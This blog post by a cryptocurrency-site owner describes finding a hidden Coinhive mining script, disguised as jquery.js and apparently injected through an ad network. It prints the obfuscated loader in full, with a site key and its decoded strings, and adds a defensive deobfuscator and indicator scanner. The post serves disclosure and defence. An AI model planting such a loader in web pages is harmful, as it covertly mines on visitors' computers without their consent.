One of the side projects I run is a website about cryptocurrencies. I focus mainly on profiling the most prominent coins and offering objective information. It’s mostly a hobby, but I opted for monetizing it using niche ads so it can pay for itself.
A well-known crypto ad network contacted me and offered me a decent deal. It was all going well until a few weeks ago. I had installed a browser extension called minerBlock just out of curiosity. I was surprised to learn that my own website was running a Coinhive script in the background.
I did notice a while back that my CPU usage would spike when I had my website open. I thought it was due to the several tabs I had running simultaneously and never made the connection to a possible mining script.
My website doesn’t run any external scripts except for the one that loaded the ads on my homepage.
Yet, I was infected with a sneaky Coinhive injection that disguised itself as a jquery.js file.
Here's the relevant code if anyone is interested:
var _0x7a2c = ["\x73\x63\x72\x69\x70\x74", "\x63\x72\x65\x61\x74\x65\x45\x6C\x65\x6D\x65\x6E\x74", "\x74\x79\x70\x65", "\x74\x65\x78\x74\x2F\x6A\x61\x76\x61\x73\x63\x72\x69\x70\x74", "\x73\x72\x63", "\x6F\x6E\x72\x65\x61\x64\x79\x73\x74\x61\x74\x65\x63\x68\x61\x6E\x67\x65", "\x6F\x6E\x6C\x6F\x61\x64", "\x61\x70\x70\x65\x6E\x64\x43\x68\x69\x6C\x64", "\x68\x65\x61\x64", "\x68\x74\x74\x70\x73\x3A\x2F\x2F\x63\x6F\x69\x6E\x68\x69\x76\x65\x2E\x63\x6F\x6D\x2F\x6C\x69\x62\x2F\x63\x6F\x69\x6E\x68\x69\x76\x65\x2E\x6D\x69\x6E\x2E\x6A\x73", "\x4B\x34\x4B\x35\x5A\x78\x63\x54\x33\x42\x6A\x62\x78\x44\x43\x42\x42\x56\x6A\x39\x37\x32\x47\x62\x51\x57\x76\x32\x6B\x55\x4E\x55", "\x73\x74\x61\x72\x74"];
function loadScript(_0xca68x2, _0xca68x3) {
    var _0xca68x4 = document[_0x7a2c[1]](_0x7a2c[0]);
    _0xca68x4[_0x7a2c[2]] = _0x7a2c[3];
    _0xca68x4[_0x7a2c[4]] = _0xca68x2;
    _0xca68x4[_0x7a2c[5]] = _0xca68x3;
    _0xca68x4[_0x7a2c[6]] = _0xca68x3;
    document[_0x7a2c[8]][_0x7a2c[7]](_0xca68x4)
}
loadScript(_0x7a2c[9], function() {
    var _0xca68x5 = new CoinHive.Anonymous(_0x7a2c[10], {
        threads: 4
    });
    _0xca68x5[_0x7a2c[11]]()
});
If you decode var _0x7a2c using a service like Hexdecoder, you'll get this:
var _0x7a2c = ["script", "createElement", "type", "text/javascript", "src", "onreadystatechange", "onload", "appendChild", "head", "https://coinhive.com/lib/coinhive.min.js", "K4K5ZxcT3BjbxDCBBVj972GbQWv2kUNU", "start"];
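As an added example (my own code, not from the original post or any ad network), here is a small deobfuscator for this exact pattern: it decodes the \xHH string array, substitutes the _0x7a2c[n] lookups with the decoded literals, and flags well-known miner indicators in the result. The embedded SAMPLE is a constructed, shortened version of the loader above with the site key left out.

```javascript
// Decode \xHH escapes inside the body of a JS string literal.
function decodeHexEscapes(s) {
  return s.replace(/\\x([0-9A-Fa-f]{2})/g, (_, h) => String.fromCharCode(parseInt(h, 16)));
}

// Find the first `var NAME = [ "...", "..." ];` declaration and return its decoded strings.
function extractStringArray(src) {
  const m = src.match(/var\s+(\w+)\s*=\s*\[([\s\S]*?)\];/);
  if (!m) return null;
  const strings = [];
  const lit = /"((?:[^"\\]|\\.)*)"/g;
  let hit;
  while ((hit = lit.exec(m[2])) !== null) strings.push(decodeHexEscapes(hit[1]));
  return { name: m[1], strings };
}

// Replace NAME[i] lookups with the literal, then turn obj["prop"] into obj.prop where legal.
function deobfuscate(src) {
  const table = extractStringArray(src);
  if (!table) return src;
  const escaped = table.name.replace(/[.*+?^${}()|[\]\\]/g, "\\$&");
  const ref = new RegExp(escaped + "\\[(\\d+)\\]", "g");
  let out = src.replace(ref, (whole, i) => {
    const v = table.strings[Number(i)];
    return v === undefined ? whole : JSON.stringify(v);
  });
  out = out.replace(/\["([A-Za-z_$][\w$]*)"\]/g, ".$1");
  return out;
}

// Defender check: report which known Coinhive indicators appear in the decoded source.
function findMinerIndicators(decoded) {
  const patterns = ["coinhive.com", "coinhive.min.js", "CoinHive.Anonymous"];
  return patterns.filter((p) => decoded.includes(p));
}

// Constructed sample: a trimmed copy of the injected loader (no site key).
const SAMPLE = String.raw`var _0x7a2c = ["\x73\x63\x72\x69\x70\x74", "\x63\x72\x65\x61\x74\x65\x45\x6C\x65\x6D\x65\x6E\x74", "\x73\x72\x63", "\x68\x65\x61\x64", "\x61\x70\x70\x65\x6E\x64\x43\x68\x69\x6C\x64", "\x68\x74\x74\x70\x73\x3A\x2F\x2F\x63\x6F\x69\x6E\x68\x69\x76\x65\x2E\x63\x6F\x6D\x2F\x6C\x69\x62\x2F\x63\x6F\x69\x6E\x68\x69\x76\x65\x2E\x6D\x69\x6E\x2E\x6A\x73"];
var el = document[_0x7a2c[1]](_0x7a2c[0]);
el[_0x7a2c[2]] = _0x7a2c[5];
document[_0x7a2c[3]][_0x7a2c[4]](el);`;

console.log(deobfuscate(SAMPLE));
console.log("indicators:", findMinerIndicators(deobfuscate(SAMPLE)));
```

Run it against any suspicious script file (for example a "jquery.js" served by an ad tag) before deciding whether it belongs on your site.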
If you don't know what Coinhive is, here's a good write-up by @fiserman.
To be clear, I have nothing against Coinhive. However, I do have a problem if you're using it to mine cryptocurrencies on random people's computers without their consent.
I won’t disclose the ad network because I can’t effectively prove they did it. The sneaky bastards.
Nonetheless, if you run a website or even if you visit those websites very often, I encourage you to use a browser extension like the one I mentioned.
Be safe,